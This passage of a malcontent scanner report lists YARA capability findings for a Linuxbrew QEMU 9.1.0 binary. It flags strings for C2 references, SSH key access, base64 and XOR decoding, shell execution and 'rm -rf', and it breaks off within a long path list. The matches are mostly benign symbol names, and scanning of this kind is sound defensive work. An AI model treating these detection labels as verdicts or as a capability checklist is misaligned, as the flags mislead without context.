------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) |
-| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
-| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) |
-| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
-| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) |
-| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
-| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) |
-| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
-| MEDIUM | 
[evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) |
-| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) |
-| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) |
-| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) |
-| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) |
-| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) |
-| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) |
-| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) |
-| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
